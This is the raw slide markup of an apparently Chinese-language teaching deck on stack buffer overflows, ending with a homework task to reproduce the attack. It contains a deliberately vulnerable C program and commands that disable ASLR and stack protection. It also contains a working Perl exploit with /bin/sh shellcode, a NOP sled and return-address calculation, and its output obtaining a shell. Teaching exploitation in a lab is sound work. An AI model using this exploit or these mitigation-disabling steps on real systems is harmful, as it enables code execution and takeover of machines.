              <a:rPr lang="en-US"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执行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strcpy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语句之后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buffer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及栈的内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 16" descr="图片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60" y="2506980"/>
            <a:ext cx="7577455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23900" y="1189355"/>
            <a:ext cx="10953749" cy="486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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法二：将Shellcode放置在跳转地址(函数返回地址所在的栈)之后</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>果 被 攻 击 的 缓 冲 区 (buffer) 的 长 度 小 于 Shellcode的长度，不足以容纳shellcode，则只能将Shellcode放置在跳转地址之后。attackStr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的内容按图3 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(a)的方式组织。</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即将执行strcpy (buffer, attackStr)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句时，buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>及栈的内容如图3(b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)所示。执行strcpy (buffer,  attackStr)语句之后，buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>及栈的内容如图4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图3(a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)中的跳转地址应按如下公式计算RETURN=buffer的起始地址+offset+4+n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其中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0&lt;n&lt;N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"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202" y="1337466"/>
            <a:ext cx="10296821" cy="46726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58775" indent="-358775" algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000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缓冲区溢出攻击是最有效的攻击方式之一，往往被黑客所利用以获得目标的控制权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</a:p>
          <a:p>
            <a:pPr marL="358775" indent="-358775" algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"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虽然缓冲区溢出漏洞很久以前就被重视并加以防范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但是由于该方式的利用价值较高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，一直被黑客研究利用，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因此溢出漏洞将长期存在并严重影响系统的安全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58775" indent="-358775" algn="just" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="110000"/>
              <a:buChar char="•"/>
            </a:pP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由于目前的Linux系统使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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地址随机化机制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以防止攻击者通过缓冲区溢出漏洞执行任意代码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为了复现实验结果，需要用以下命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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关闭地址随机化机制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lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="11000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   sudo sysctl -w kernel.randomize_va_space=0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58775" indent="-358775" algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"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0" name="矩形 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3209925" y="247949"/>
              <a:ext cx="8982075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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362585" y="316230"/>
            <a:ext cx="2847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0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缓冲区溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="08477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0850" y="1354321"/>
            <a:ext cx="752348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algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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图</a:t>
            </a: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3(a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 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攻击串的构造</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 17" descr="图片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70" y="2399030"/>
            <a:ext cx="7555230" cy="274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2205" y="1300664"/>
            <a:ext cx="752348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algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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图3(b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) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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即将执行strcpy之前buffer及栈的内容</a:t>
            </a:r>
            <a:endParaRPr sz="24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4" name="图片 24" descr="图片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2274570"/>
            <a:ext cx="8288020" cy="3120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7920" y="1374324"/>
            <a:ext cx="10151745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algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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图</a:t>
            </a:r>
            <a:r>
              <a:rPr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  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执行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strcpy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语句之后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buffer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及栈的内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 27" descr="图片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" y="2473325"/>
            <a:ext cx="8547100" cy="271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13187" y="1148080"/>
            <a:ext cx="11235913" cy="496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 fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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目前的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Linux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发行版本默认采用了地址随机化技术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buffer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的起始地址会动态变化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，从而无法准确计算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RETURN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。传统的方法是通过调试技术获得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buffer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的起始地址大概取值范围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然后加上偏移和在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Shellcode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前面加上大量的</a:t>
            </a:r>
            <a:r>
              <a:rPr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nop</a:t>
            </a:r>
            <a:r>
              <a:rPr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指令</a:t>
            </a:r>
            <a:r>
              <a:rPr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(0x90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)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，这样的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N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足够大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,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以至于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RETURN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必然指向其中的某个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NOP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，从而确保最终会执行到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shellcode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。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41300" marR="5080" indent="-228600" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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如果关闭了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Linux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系统的地址随机化机制（设置内核变量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kernel.randomize_va_space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的值为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，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在终端输入命令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sudo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sysctl-w  </a:t>
            </a:r>
            <a:r>
              <a:rPr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kernel.randomize_va_space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=0</a:t>
            </a:r>
            <a:r>
              <a:rPr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），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对于本地溢出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，有一种方法可以更精确定位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shellcode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的地址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把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Shellcode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放在环境变量中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。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41300" marR="5080" indent="-228600" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="24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4608830" y="247949"/>
              <a:ext cx="7583170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27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882650" y="336550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l"/>
            <a:r>
              <a:rPr sz="2400" spc="600" dirty="0" err="1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缓冲区溢出攻击技术</a:t>
            </a:r>
            <a:endParaRPr sz="2400" spc="600" dirty="0" err="1" smtClean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445" y="2657207"/>
            <a:ext cx="628650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algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2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图5  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0"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把shellcode放在环境变量中</a:t>
            </a:r>
            <a:endParaRPr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 descr="图片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45" y="3769996"/>
            <a:ext cx="6120130" cy="18288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980362" y="3267112"/>
            <a:ext cx="3298190" cy="3085593"/>
            <a:chOff x="8004810" y="3508882"/>
            <a:chExt cx="3298190" cy="3085593"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3" descr="图片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4810" y="3900170"/>
              <a:ext cx="3298190" cy="2694305"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9168736" y="3508882"/>
              <a:ext cx="1890395" cy="22923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300" spc="25" dirty="0">
                  <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>低地址（堆栈增长方向）</a:t>
              </a:r>
              <a:endParaRPr sz="1300" dirty="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0" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1189355"/>
            <a:ext cx="10953749" cy="486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dirty="0" err="1" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>放在环境变量中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069" y="342469"/>
            <a:ext cx="10261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pc="600" dirty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演示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1866899" y="247949"/>
              <a:ext cx="10325101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object 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2800857" y="858888"/>
            <a:ext cx="5725160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 panose="02020603050405020304"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304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环境变量在堆栈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中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的位置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0149" y="1527810"/>
            <a:ext cx="10363201" cy="446994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27100" lvl="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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gdb buf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1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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b *(main+0)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1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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r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marR="5080" lvl="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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x/20x </a:t>
            </a:r>
            <a:r>
              <a:rPr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</a:t>
            </a:r>
            <a:r>
              <a:rPr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0xbffffffc </a:t>
            </a:r>
            <a:r>
              <a:rPr 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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" marR="5080" lvl="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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     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0xbffffffc:0x00000000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Cannot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access  memory at  0xc0000000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marR="5080" lvl="2">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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x/20s 0xbffffffc-0x400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lvl="2">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="191135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0xbffffbfc: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"_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PATH=/org/freedesktop/DisplayManager/Seat0"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lvl="2">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="191135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0xbffffc28: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 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"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SSH_AUTH_SOCK=/tmp/keyring-ZIrjwi/ssh"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584200" marR="5080" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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由此可见，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Linux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系统的环境变量占的空间是很大的，一般在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1KB(0x400)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以上，</a:t>
            </a:r>
            <a:r>
              <a:rPr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足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以</a:t>
            </a:r>
            <a:r>
              <a:rPr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容纳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shellcode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。如果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shellcode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放在环境变量所占的堆栈，可以准确计算出跳转地址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。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469900" marR="5080" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="89000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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776" y="314109"/>
            <a:ext cx="10261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pc="600" dirty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演示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1914524" y="247949"/>
              <a:ext cx="10277476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object 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613187" y="1104265"/>
            <a:ext cx="10702513" cy="538775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84200" marR="10160" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10500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用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0xbffffffc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减去程序路径的长度和后面的结束符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再减去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shellcode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的长度和后面的结束符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就可以精确得到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shellcode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开始的地址。计算公式如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1205865" indent="0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640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RETURN = 0xbffffffc - (length($path)+1)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length($shellcode)+1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="584200" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10500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该方法的关键在于把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shellcode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放到环境变量中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="584200" marR="5080" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="104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在现代的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Linux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操作系统中</a:t>
            </a:r>
            <a:r>
              <a:rPr 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gcc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默认打开了栈不可执行开关，需要在编译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程序时用以下选项允许栈可执行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endParaRPr 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41300" marR="5080" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1045"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2413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	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-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z execstack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584200" marR="16510" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="103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如果我们能把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shellcode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放在环境变量中的某个地址开始的栈中，则可将该地址作为</a:t>
            </a:r>
            <a:r>
              <a:rPr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跳转地址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，并通过命令行参数的形式输入到被攻击的程序中，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从而溢出后跳转到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shellcode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584200" marR="16510" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="103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通过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perl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语言的内置变量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%ENV</a:t>
            </a:r>
            <a:r>
              <a:rPr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可以修改环境变量的值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。实现该功能的例程见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exploit.pl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314109"/>
            <a:ext cx="10261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pc="600" dirty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例程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1752599" y="247949"/>
              <a:ext cx="10439401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object 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101113" y="879475"/>
            <a:ext cx="2684145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 panose="02020603050405020304"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="020206030504050203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例程：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vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr sz="24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092530" y="1262720"/>
            <a:ext cx="10438410" cy="521360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927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="855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char Lbuffer[] = "01234567890123456789========ABCD";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="755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void foo()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="770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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1181100" lvl="2">
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2444750" algn="l"/>
              </a:tabLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr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char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vulnbuff[16];	strcpy (vulnbuff, Lbuffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1181100" lvl="2">
              <a:spcBef>
                <a:spcPts val="760"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3416300" algn="l"/>
              </a:tabLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr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("\n%s\n", vulnbuff);	getchar(); /* for debug */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="765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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="755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int main (int argc, char *argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="760"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="388620" algn="l"/>
                <a:tab pos="3319145" algn="l"/>
              </a:tabLst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{	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2">
              <a:spcBef>
                <a:spcPts val="760"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="388620" algn="l"/>
                <a:tab pos="3319145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   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr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(Lbuffer, argv[1]);	foo();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="770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}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gcc -fno-stack-protector -z execstack -o vul ../src/vulnerable.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2280"/>
              </a:lnSpc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该程序从命令行输入一些信息，用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gdb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对其可执行代码调试可知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当输入的信息超出了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28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个字节时会产生溢出错误。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332944"/>
            <a:ext cx="10261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pc="600" dirty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例程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1752599" y="247949"/>
              <a:ext cx="10439401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object 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239520" y="942156"/>
            <a:ext cx="9838689" cy="554562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#!/usr/bin/perl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exploit.pl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以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"$"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定义变量，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"."(dot)</a:t>
            </a:r>
            <a:r>
              <a:rPr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点号连接上下两行字符串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$shellcode ="\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".  "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr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xcd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\x80";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修改以下代码行，设置正确的程序路径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path="/home/ns/overflow/bin/vul";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计算跳转地址的值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$ret = 0xbffffffc - (length($path)+1) - (length($shellcode)+1);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$new_retword = pack('l', $ret);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printf("[+] Using ret shellcode 0x%x\n",$ret);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$nops="\x90\x90\x90\x90\x90\x90\x90\x90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";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8 NOPs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03149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$nops=$nops.$nops.$nops;	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	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24 NOPs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$nops=$nops."\x90\x90\x90\x90"; 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	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28 NOPs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126105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$argv=$nops.$new_retword;	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	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28 NOPs+RETURN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2424430">
              <a:lnSpc>
                <a:spcPct val="112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%ENV=(); $ENV{SHELLCODE}=$shellcode;  exec "$path",$argv;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314109"/>
            <a:ext cx="10261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pc="600" dirty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例程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1752599" y="247949"/>
              <a:ext cx="10439401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object 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726440" y="979170"/>
            <a:ext cx="11103609" cy="604729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84200" marR="8890" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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在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Linux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系统的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terminal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中输入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perl</a:t>
            </a:r>
            <a:r>
              <a:rPr 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exploit.pl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</a:t>
            </a:r>
            <a:r>
              <a:rPr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则可以得到一个本地</a:t>
            </a:r>
            <a:r>
              <a:rPr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shell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</a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="595"/>
              </a:spcBef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ns@ubuntu:~/overflow/bin$ </a:t>
            </a:r>
            <a:r>
              <a:rPr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perl ../src/exploit.pl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lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="155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[+] Using ret shellcode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0xbfffffcb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384300" lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="255"/>
              </a:spcBef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ahoma" panose="020B0604030504040204"/>
              </a:rPr>
              <a:t>��������������������</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1384300" lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc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ahoma" panose="020B0604030504040204"/>
              </a:rPr>
              <a:t>������������</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1384300" lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="155"/>
              </a:spcBef>
            </a:pP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584200" marR="5080" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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如果要观察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vulnerable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的运行情况，则输入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perl exploit.pl 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后先不按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Enter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键，在另一个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具有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root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权限的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) terminal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输入：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1155065" lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6985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ps –A | grep vul</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1155065" lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6985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sudo gdb vul 3345    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注：假定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3345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为进程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ID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号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)</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="006F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155065" lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6985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x/i   0xbfffffcb            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(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注：查看</a:t>
            </a:r>
            <a:r>
              <a:rPr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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode)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697865" lvl="1" indent="-227965" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="698500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr sz="2400" b="1" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="006FC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97865" lvl="1" indent="-227965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698500" algn="l"/>
              </a:tabLst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0" name="矩形 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3165893" y="247949"/>
              <a:ext cx="9026107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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="306594" y="326492"/>
            <a:ext cx="287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0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缓冲区溢出概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="811830" y="1399923"/>
            <a:ext cx="9876155" cy="41573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8775" indent="-358775" algn="just" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100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缓冲区是一块用于存取数据的内存，其位置和长度（大小）在编译时确定或在程序运行时动态分配。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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栈(stack)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堆(heap)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都是缓冲区。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" indent="-358775" algn="just" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100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当向缓冲区拷贝数据时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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若数据的长度大于缓冲区的长度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，则多出的数据将覆盖该缓冲区之外的（高地址）内存，从而覆盖了邻近的内存，这就是所谓的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缓冲区溢出错误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。如果缓冲区溢出错误能被攻击者利用，则称为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缓冲区溢出漏洞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marL="358775" indent="-358775" algn="just" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef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如果C语言中的字符串拷贝操作不检查字符串长度，则有可能发生缓冲区溢出错误。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336550"/>
            <a:ext cx="10261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spc="600" dirty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作业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16" name="矩形 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1638935" y="247949"/>
              <a:ext cx="10553065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object 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726440" y="1578891"/>
            <a:ext cx="10096566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 panose="02020603050405020304"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="469900" indent="-45720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复现以下缓冲区溢出攻击实验，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" err="1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写实验</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0" err="1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报</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="0" dirty="0" err="1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告</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="0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详细描述跟踪调试过程</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="0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313517"/>
            <a:ext cx="29562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存在漏洞的程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" spc="600" dirty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336651"/>
            <a:ext cx="12192000" cy="401597"/>
